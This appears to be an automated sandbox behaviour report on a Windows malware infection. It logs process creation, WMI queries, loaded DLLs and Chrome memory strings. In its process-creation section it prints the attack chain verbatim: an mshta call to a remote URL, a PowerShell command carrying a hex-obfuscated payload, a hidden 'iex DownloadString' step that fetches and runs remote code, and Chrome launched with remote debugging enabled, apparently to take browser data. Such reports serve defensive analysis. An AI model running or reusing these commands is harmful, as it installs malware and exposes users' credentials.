Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;e)
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290233202.0000781C02ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';0\
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';\'x
Source: chrome.exe, 00000009.00000002.57296095824.0000781C03388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297211801.0000781C03494000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: chrome.exe, 00000009.00000002.57289934914.0000781C02A74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
